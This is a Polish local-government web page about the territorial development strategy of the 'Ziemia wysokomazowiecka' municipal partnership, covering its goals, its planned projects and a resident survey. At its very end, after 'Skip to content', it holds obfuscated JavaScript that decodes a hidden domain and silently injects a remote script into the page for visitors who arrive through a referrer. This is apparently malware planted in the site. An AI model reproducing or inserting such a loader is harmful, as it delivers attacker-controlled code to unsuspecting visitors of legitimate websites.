Centrum Wsparcia Doradczego Ziemia Wysokomazowiecka

Drodzy Mieszkańcy!

Aktualnie trwają prace nad strategią terytorialną Partnerstwa „Ziemia wysokomazowiecka”, które tworzą gminy: Miasto Wysokie Mazowieckie, Gmina Ciechanowiec, Gmina Czyżew, Gmina Klukowo, Gmina Kobylin Borzymy, Gmina Kulesze Kościelne, Gmina Nowe Piekuty, Gmina Sokoły, Gmina Szepietowo, Gmina Wysokie Mazowieckie oraz Powiat Wysokomazowiecki. Do tej chwili Partnerzy wypracowali wspólnie propozycje czterech celów strategicznych i realizujących je projektów.

Projekty mają charakter partnerski, ponieważ odpowiadają na zdiagnozowane wspólne potrzeby społeczności – nie jednej a kilku gmin, a z ich efektów będą korzystać mieszkańcy całego obszaru Partnerstwa.

Głos mieszkańców jest dla nas ważny, dlatego zapraszamy Państwa do aktywnego współtworzenia tego ważnego dla Partnerstwa dokumentu.

Zgłoszone opinie, uwagi zostaną starannie przeanalizowane. Liczymy na to, że pomogą nam one w opracowaniu i udoskonaleniu zapisów strategii.

Dziękujemy za udział w tworzeniu tego ważnego dokumentu!

Rada Partnerstwa „Ziemia wysokomazowiecka”

Strategia Terytorialna Partnerstwa „Ziemia wysokomazowiecka”

Wizja rozwoju Partnerstwa „Ziemia wysokomazowiecka” to:

długoterminowe, stałe pogłębianie i poszerzanie zakresu współpracy Partnerów na rzecz podnoszenia szeroko rozumianej jakości życia mieszkańców obszaru Partnerstwa osiąganej poprzez ich aktywność i kompetencje, zrównoważony rozwój gospodarczy i zachowanie walorów środowiska obszaru Partnerstwa.

 

 

 

 

Cele strategiczne Partnerstwa Ziemia wysokomazowiecka

Cel strategiczny 1: „Innowacyjna i zrównoważona gospodarka”

Cel strategiczny 2: „Aktywna społeczność dla rozwoju”

Cel strategiczny 3: „Czyste środowisko i wysokiej jakości przestrzeń do życia”

Cel strategiczny 4: „Partnerska Ziemia wysokomazowiecka”

 

 

Proponowane projekty strategiczne i uzupełniające strategii terytorialnej Partnerstwa „Ziemia wysokomazowiecka”

Cel strategiczny 1: Innowacyjna i zrównoważona gospodarka

Projekt strategiczny 1: „Wysokomazowiecka Dolina Rolnicza 4.0”

Podprojekt: „Innowacyjne rozwiązania w produkcji rolnej” (Partner Wiodący: Gmina Szepietowo/PODR)

Podprojekt: „Innowacyjne rozwiązania w przetwórstwie prowadzonym w gospodarstwach rolnych” (Partner Wiodący: Gmina Szepietowo/PODR)

Podprojekt: „Centrum Krajowego Białka Paszowego” (Partner Wiodący: Gmina Szepietowo/PODR)

Podprojekt: „Genomowanie krów mlecznych” (Partner Wiodący: Gmina Klukowo)

Podprojekt: „Spółdzielnia Producentów Owoców i Warzyw” (Partner Wiodący: Gmina Szepietowo/PODR)

Podprojekt: „Zastępca rolnika – wypracowanie systemu profesjonalnego zastępstwa rolnika” (Partner Wiodący: Gmina Klukowo)

Projekt uzupełniający: „Podlaska Strefa Zrównoważonego Rozwoju” – 1. Uruchomienie inkubatora kuchennego w Krzyżewie, 2. Utworzenie spółdzielni rolniczej, 3. Utworzenie Centrum Aktywnosci Gospodarczej, 4. Utworzenie obszaru przedsiębiorczości oraz obszaru zabudowy usługowo-mieszkaniowej, 5. Utworzenie obszaru energetyki odnawialnej (Partner wiodący: Gmina Sokoły)

Projekt uzupełniający: „Nie tylko rolnictwo – wsparcie tworzenia i rozwoju lokalnych przedsiębiorstw (m.in. utworzenie Biura Promocji Gospodarczej OP, oferującego wsparcie informacyjne i doradcze oraz pomoc w spełnieniu wymogów, Stworzenie Klubu Młodych Przedsiębiorców, Wysokomazowieckie Anioły Biznesu – Partner Wiodący: Gmina Czyżew)

Projekt uzupełniający: Turystyka instrumentem marketingu OP (Partner Wiodący: Gmina Ciechanowiec)

Cel strategiczny 2: Aktywna społeczność dla rozwoju

Projekt strategiczny 2: „Aktywna, przedsiębiorcza młodzież” – integracja, aktywizacja społeczna oraz poszerzenie oferty edukacyjnej (formalnej i nieformalnej) dla dzieci i młodzieży w kierunku innowacyjności, współpracy (praca zespołowa projektowa), przedsiębiorczości (Partner Wiodący: Gmina Ciechanowiec)

Projekt uzupełniający: Wsparcie dla realizacji potrzeb mieszkaniowych młodych ludzi na obszarze Partnerstwa „Ziemia wysokomazowiecka” (Partner Wiodący: Gmina Kulesze Kościelne)

Projekt uzupełniający: „Podniesienie kompetencji cyfrowych mieszkańców OP” – w zakresie korzystania e-usług i bezpieczeństwa w internecie (Partner Wiodący: Gmina Klukowo)

Projekt uzupełniający: „Srebrny kapitał” – integracja i aktywizacja mieszkańców w wieku poprodukcyjnym na rzecz rozwoju osobistego oraz społecznego, uspołecznianie” pomocy społecznej i wykorzystanie w niej cyfryzacji (teleopieka) (Partner Wiodący: Gmina Sokoły)

Cel strategiczny 3: Czyste środowisko i wysokiej jakości przestrzeń do życia

Projekt strategiczny 3: „Partnerstwo Ziemia wysokomazowiecka samowystarczalne energetycznie” – utworzenie klastra energii oraz spółdzielni energetycznych według koncepcji: „obywatelskich wspólnot energetycznych” oraz „wspólnot energetycznych opartych na energii odnawialnej” oraz zakład mineralizacji odpadów i osadów (Partner Wiodący: Miasto Wysokie Mazowieckie)

Projekt uzupełniający: „Edukacja oraz planowanie przestrzenne chroniące nieodnawialne/wolno/trudno odnawialne zasoby: krajobraz, przyrodę, przestrzeń publiczną, materialne dziedzictwo kulturowe (Partner Wiodący: Kulesze Kościelne)

Projekt uzupełniający: Ochrona zasobów wodnych obszaru Partnerstwa – utworzenie zbiorników retencyjnych na: rzece Brok w Wysokiem Mazowieckim, rzece Mianka w obrębie miejscowości Pułazie-Świerże i Wyszonki Posele, zielono-niebieska infrastruktura oraz regulacja systemu wodno-kanalizacyjnego na terenie partnerstwa, a także budowa przydomowych oczyszczalni ścieków na obszarach wiejskich Partnerstwa (Partner Wiodący: Gmina Wysokie Mazowieckie i Gmina Nowe Piekuty)

Projekt uzupełniający: „Ekologia się opłaca” – edukacja społeczności lokalnej OP na rzecz ochrony i lepszego wykorzystania jego walorów środowiskowych (Partner Wiodący: Kobylin-Borzymy)

Cel strategiczny 4: Partnerska Ziemia wysokomazowiecka

Projekt strategiczny 4: „Utworzenie Centrum Działań Wspólnych” – jednostki analizującej sytuację społeczno-gospodarczą OP i wypracowującej i koordynującej partnerskie działania (polityki, projekty) na rzecz rozwoju społeczno-gospodarczego OP (Partner Wiodący: Miasto Wysokie Mazowieckie)

Projekt uzupełniający: „Wykorzystanie narzędzi cyfrowych i baz danych funkcjonujących w każdej gminie dla sprawnego świadczenia usług publicznych na obszarze Partnerstwa” (Partner Wiodący: Nowe Piekuty)

Projekt uzupełniający: „Upowszechnienie funduszy sołeckich i budżetów obywatelskich na obszarze Partnerstwa Ziemia wysokomazowiecka” (Partner Wiodący: Gmina Wysokie Mazowieckie)

Cele strategiczne i operacyjne Strategii Rozwoju Województwa Podlaskiego (SRWP) jako kontekst Strategii Terytorialnej Partnerstwa „Ziemia wysokomazowiecka”

SRWP wskazuje cele, które wzmocnią konkurencyjność województwa podlaskiego.

Te cele to: dynamiczna gospodarka, w której: rozwijane są przemysły przyszłości, innowacje, stawia się na lokalnych przedsiębiorców i kontynuuje rewolucję energetyczną, w której to mieszkańcy są wytwórcami energii w oparciu o odnawialne źródła.

Kolejny cel to zamożni mieszkańcy: aktywni, kompetentni, żyjący w przestrzeni wysokiej jakości: jeżdżący szerokimi, równymi drogami, leczący się wyspecjalizowanych szpitalach, korzystający z dóbr kultury, wysokiej jakości edukacji.

I trzeci cel: partnerski region, dobrze zarządzany, współpracujący z innymi regionami i krajami.

To ambitne cele, ale misja Strategii brzmi: „Ambitne Podlaskie”. 

Wizja regionu zawarta jest w haśle „4P”: Podlaskie jest przedsiębiorcze, partnerskie i perspektywiczne.

Cele strategiczne Strategii Rozwoju Województwa Podlaskiego:

1.Dynamiczna gospodarka;

Cele operacyjne:

 1. Przemysły przyszłości;
 2. Podlaski system otwartych innowacji;
 3. Lokalna przedsiębiorczość;
 4. Rewolucja energetyczna i gospodarka obiegu zamkniętego;
 5. E-podlaskie
 1. Zasobni mieszkańcy;

 Wyróżnienie celu strategicznego zasobni mieszkańcy ma skupić uwagę polityki rozwoju regionu na budowaniu i rozwijaniu silnego kapitału ludzkiego, który traktowany jest jako najważniejszy zasób regionu

Cele operacyjne:

 1. Kompetentni mieszkańcy;
 2. Aktywni mieszkańcy;
 3. Przestrzeń wysokiej jakości.
 1. Partnerski region.

W warunkach pogarszających się trendów globalnych oraz zachodzących zmian w UE, np. w sposobie finansowania, kluczowego znaczenia nabiera doskonałość zarządzania rozwojem regionalnym i lokalnym w województwie.

Podobnie jak w sektorze gospodarczym, braki lub słabości zasobów organizacji powinny być uzupełniane poprzez pozyskiwanie tych zasobów z zewnątrz. Najlepszą drogą prowadzącą do wzmocnienia regionu o brakujące zasoby jest współpraca, ponieważ w trakcie jej realizacji powstają dodatkowe korzyści (zaufanie, synergia). Współpraca pozwala organizacjom tworzyć nawet globalne przewagi konkurencyjne i umożliwia osiągnięcie ambitnych celów. Z punktu widzenia rozwoju regionu ważne jest rozwijanie wszelkich form współpracy i powiązań sieciowych w układach zewnętrznych, poprzez ciągłe komunikowanie się, wymianę informacji, wiedzy, dobrych praktyk oraz tworzenie powiązań o różnym stopniu formalizacji.

Cele operacyjne:

 1. Dobre zarządzanie;
 2. Kapitał społeczny;
 3. Partnerstwa międzynarodowe i ponadregionalne;
 4. Gościnny region.

Koncentracja polityki rozwoju na trzech celach strategicznych odpowiada jednocześnie potrzebom i aspiracjom mieszkańców regionu. Dynamiczna gospodarka pozwoli utrzymać korzystną trajektorię rozwoju dzięki między innymi: przemysłom przyszłości, systemowi otwartych innowacji, lokalnej przedsiębiorczości, rewolucji energetycznej oraz wdrożeniu i rozpowszechnieniu idei e-podlaskie.

Zwiększenie zasobności mieszkańców będzie odbywało się dzięki budowaniu i wzmacnianiu kompetencji mieszkańców Podlaskiego, a także działaniom zwiększającym możliwości rozwijania aktywności społecznych w nowoczesnych przestrzeniach wysokiej jakości.

Zasobność mieszkańców regionu będzie również efektem osiągania sukcesów w pozostałych celach strategicznych, głównie w celu dynamiczna gospodarka.

 

Realizacja celu strategicznego partnerski region wiąże się ze stymulowaniem dobrego rządzenia, rozwijaniem kapitału społecznego, wspieraniem relacji międzynarodowych i ponadregionalnych oraz wykorzystaniem potencjału, jaki wynikać może z zewnętrznego zainteresowania województwem podlaskim.

Te cele strategiczne i operacyjne realizowane będą we współpracy poszczególnych interesariuszy (wymiar partycypacji społecznej) oraz z uwzględnieniem specyfiki przestrzennej (wymiar terytorialny).

 

 

 

Ankieta-dotyczaca-potencjalnych-projektow-w-ramach-Strategii-Terytorialnej-Partnerstwa-Ziemia-Wysokomazowiecka-1

Szanowni Mieszkańcy obszaru Partnerstwa „Ziemia wysokomazowiecka” !

Gminy: Wysokie Mazowieckie – gmina miejska, Wysokie Mazowieckie – gmina wiejska, Kulesze Kościelne, Kobylin-Borzymy, Sokoły, Nowe Piekuty, Szepietowo, Czyżew, Klukowo, Ciechanowiec oraz Powiat Wysokomazowiecki utworzyły Partnerstwo „Ziemia wysokomazowiecka”, którego celem jest długofalowa, celowa i efektywna współpraca na rzecz ich zrównoważonego rozwoju, umożliwiającego realizację potrzeb obecnego i przyszłych pokoleń ich mieszkańców.

Służyć temu będzie m.in. aktualnie opracowywana Strategia Terytorialna Partnerstwa, definiująca strategiczne kierunki i działania rozwojowe, realizowane zarówno przez podmioty sektora publicznego, jak również gospodarczego i społecznego.

Zapraszamy Państwa do zgłaszania propozycji projektów wpisujących się w przedstawione poniżej kierunki działania. Projekty powinny mieć charakter partnerski (ich oddziaływanie powinno wykraczać poza Państwa gminę) oraz rozwiązywać więcej niż jeden problem, realizować potrzeby więcej niż jednej grupy społecznej i wykorzystywać więcej niż jeden potencjał obszaru/społeczności Partnerstwa.

Projekt można zgłosić przez wypełnienie ankiety i dostarczenie do sekretariatu Urzędu Gminy w Kuleszach Kościelnych, bądź przesłanie drogą e-mailową na adres: do dnia 19 lipca 2021 roku

Dziękujemy!

Przewodniczący Rady Partnerstwa „Ziemia wysokomazowiecka”:

Bogdan Zieliński, Starosta Powiatu Wysokomazowieckiego

Jarosław Siekierko, Burmistrz Miasta Wysokie Mazowieckie

 

ankieta dla mieszkańców Gminy Kulesze Kościelne

Perspektywa Finansowa UE 2021-2027 czas start!

Razem przygotujemy dobre projekty dla naszych mieszkańców!

Samorządy powiatu wysokomazowieckiego przystąpiły do pilotażowego projektu Centrum Wsparcia Doradczego (CWD). CWD to innowacyjny projekt, który ma na celu wsparcie gmin i powiatów w zawiązaniu współpracy, wyznaczeniu wspólnych celów rozwojowych, opracowaniu dobrych projektów i realizacji w przyszłości potrzebnych dla mieszkańców inwestycji.

Powiat Wysokomazowiecki, Miasto Wysokie Mazowieckie, Gmina Wysokie Mazowieckie, Gmina Szepietowo, Gmina Kulesze Kościelne, Gmina Kobylin Borzymy, Gmina Sokoły, Gmina Czyżew, Gmina Klukowo, Gmina Nowe Piekuty, Miasto i Gmina Ciechanowiec ze wsparciem ekspertów ze Związku Miast Polskich  opracują w ciągu najbliższych miesięcy portret Partnerstwa, wyznaczą najpilniejsze cele oraz plan wspólnych działań i kluczowych projektów. Przeprowadzone zostaną ankiety wśród uczniów ostatnich klas szkół średnich, wśród mieszkańców oraz liderów, warsztaty strategiczne, wywiady, debaty, spotkania i konsultacje. Duże znaczenie w CWD ma zaangażowanie mieszkańców, konsultacje i aktywne komentowanie kolejnych wyników prowadzonych prac projektowych.

Naszemu Partnerstwu przyporządkowani zostali Doradcy Partnerstwa udzielający bezpośredniego, merytorycznego doradztwa strategicznego, moderujący i animujący proces współpracy oraz nadzorujący i koordynujący całość doradztwa dla Partnerstwa. Funkcję tę pełnią osoby mające doświadczenie w doradztwie strategicznym dla samorządów lokalnych oraz odpowiednią wiedzę i doświadczenie w zakresie komunikacji, animacji i budowania relacji. Wsparcie doradcze Związku Miast Polskich w formie analiz, opinii i konsultacji dla projektów zidentyfikowanych przez uczestników Partnerstwa Ziemia Wysokomazowiecka jako kluczowe dla rozwoju obszaru czyni nasze Partnerstwo dobrze uzbrojonym w argumenty negocjacyjne z instytucjami odpowiedzialnymi za dystrybucje środków europejskich w Perspektywie 2021-2027.

Partnerami w tym przedsięwzięciu, poza Związkiem Miast Polskich są także Ministerstwo Funduszy i Polityki Regionalnej oraz Urząd Marszałkowski Województwa Podlaskiego.

Partnerstwo Ziemia Wysokomazowiecka to wymierne korzyści dla wspólnot lokalnych

Chcemy wzmocnić współpracę miedzy naszymi samorządami. Będziemy analizować jak zmniejszyć koszty świadczenia usług publicznych, tworzyć zespoły negocjacyjne, których celem będzie skuteczne pozyskiwanie pieniędzy na realizację projektów z funduszy zewnętrznych. Wybrane do realizacji projekty przyczynią się do rozwoju społeczności lokalnych oraz do stworzenia nowych miejsc pracy i poprawy jakości w sektorze usług.

Realizacja Centrum Wsparcia Doradczego przewidziana jest na 2 lata. W tym czasie dobre praktyki współpracujących samorządów mogą być udostępniane innym gminom. Ziemia Wysokomazowiecka może być przykładem do naśladowania dla innych.

Zapraszamy do współpracy!

W imieniu Partnerstwa Ziemia Wysokomazowiecka Wójt Gminy Kulesze Kościelne

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);